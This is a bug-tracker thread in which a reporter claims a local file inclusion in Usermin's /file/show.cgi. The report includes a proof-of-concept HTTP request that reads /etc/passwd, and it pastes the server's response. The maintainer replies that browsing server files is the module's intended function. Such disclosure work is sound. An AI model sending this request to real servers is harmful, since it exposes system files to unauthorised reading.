https://sourceforge.net/p/webadmin/usermin-bugs/480/2019-10-21T19:57:53.581000ZRecent changes to 480: Local File Inclusion in /file/show.cgi/2019-10-21T19:57:53.581000Z2019-10-21T19:57:53.581000ZJamie Cameronhttps://sourceforge.net/u/jcameron/https://sourceforge.netade6ade3698570af12886b8e1ce424fec07a3cf1

<div class="markdown_content"><p>I don't see how that's a vulnerability - the while point of the file manager module is to allow users to browse files on the server.</p></div>

2019-10-21T10:24:41.997000Z2019-10-21T10:24:41.997000ZPeterhttps://sourceforge.net/u/inf0seq/https://sourceforge.net6412b0b6d461fbbe6eb35ec935587c670ae72d62

<div class="markdown_content"><p>Low-privileged user can exploit a local file include vulnerability. It is possible to retrieve configuration files from the remote system.</p> <p>Proof-of-Concept:</p> <p>GET /file/show.cgi/etc/passwd HTTP/1.1<br/> Host: 10.0.0.5:20000<br/> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0<br/> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,<em>/</em>;q=0.8<br/> Accept-Language: en-US,en;q=0.5<br/> Accept-Encoding: gzip, deflate<br/> Connection: close<br/> Cookie: redirect=1; testing=1; usid=b13f01f0151e6eea18ed9994bd77393f<br/> Upgrade-Insecure-Requests: 1</p> <p>HTTP/1.0 200 Document follows<br/> Date: Mon, 21 Oct 2019 06:41:42 GMT<br/> Server: MiniServ/1.780<br/> Connection: close<br/> X-no-links: 1<br/> Content-length: 2485<br/> X-Content-Type-Options: nosniff<br/> Content-type: text/plain; charset=windows-1251</p> <p>root❌0:0:root:/root:/bin/bash<br/> daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin<br/> bin❌2:2:bin:/bin:/usr/sbin/nologin<br/> sys❌3:3:sys:/dev:/usr/sbin/nologin<br/> sync❌4:65534:sync:/bin:/bin/sync<br/> games❌5:60:games:/usr/games:/usr/sbin/nologin<br/> man❌6:12:man:/var/cache/man:/usr/sbin/nologin<br/> lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin<br/> <span>[...]</span></p></div>